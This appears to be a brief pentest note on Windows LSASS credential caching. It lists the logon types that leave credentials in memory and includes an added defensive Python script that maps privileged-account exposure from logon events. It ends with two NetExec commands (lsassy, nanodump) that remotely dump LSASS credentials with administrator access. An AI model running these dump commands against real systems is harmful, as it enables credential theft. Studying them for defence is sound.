LSASS
Local Security Authority Subsystem Service
When does LSASS store credentials?
Credentials are cached in LSASS whenever a user authenticates in an interactive manner. The following types of activity will put the user’s credential material into memory:
Starting a local session
Starting an RDP session
Running a task via RunAs
Running an active Windows Service
Running a scheduled task
Running a batch job
Running a task by utilizing a remote administration tool
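From the defender's side, each activity above is recorded as a 4624 logon event with a particular LogonType. The following is an added example, not part of the original page: it parses constructed 4624 event XML and reports which hosts hold credential material for privileged accounts. The LogonType mapping, host names and account names are assumptions.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Assumed mapping (not from the page): 4624 LogonType values for the listed activities.
CACHING_LOGON_TYPES = {2: "Interactive (local session, RunAs)",
                       4: "Batch (scheduled task, batch job)",
                       5: "Service",
                       9: "NewCredentials (RunAs /netonly)",
                       10: "RemoteInteractive (RDP)"}

def make_event(host, user, logon_type, event_id=4624):
    """Build a constructed event, trimmed to the fields this check reads."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{host}</Computer></System><EventData>'
            f'<Data Name="TargetUserName">{user}</Data>'
            f'<Data Name="LogonType">{logon_type}</Data></EventData></Event>')

# Constructed sample data: hosts and account names are made up.
SAMPLE_EVENTS = [
    make_event("WS01", "da-alice", 10),
    make_event("WS01", "da-alice", 3),                 # network logon, not in the mapping
    make_event("SRV02", "svc-backup", 5),
    make_event("SRV02", "bob", 2),                     # not a privileged account
    make_event("SRV02", "da-alice", 4),
    make_event("WS01", "da-alice", 2, event_id=4634),  # logoff event, skipped
]

def credential_exposure(events_xml, privileged):
    """Return {host: {(user, logon description)}} for privileged accounts."""
    exposure = defaultdict(set)
    for raw in events_xml:
        root = ET.fromstring(raw)
        if root.findtext("e:System/e:EventID", namespaces=NS) != "4624":
            continue
        host = root.findtext("e:System/e:Computer", namespaces=NS)
        data = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
        try:
            logon_type = int(data.get("LogonType", ""))
        except ValueError:
            continue  # malformed LogonType field
        user = data.get("TargetUserName", "").lower()
        if logon_type in CACHING_LOGON_TYPES and user in privileged:
            exposure[host].add((user, CACHING_LOGON_TYPES[logon_type]))
    return dict(exposure)

if __name__ == "__main__":
    for host, hits in sorted(credential_exposure(SAMPLE_EVENTS, {"da-alice", "svc-backup"}).items()):
        for user, how in sorted(hits):
            print(f"{host}: {user} via {how}")
```

Hosts that appear in the output for a domain-level account are the ones where that account's credentials should be treated as exposed if the host is compromised.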
Dump
Using Lsassy
nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
Using nanodump
nxc smb 192.168.255.131 -u administrator -p pass -M nanodump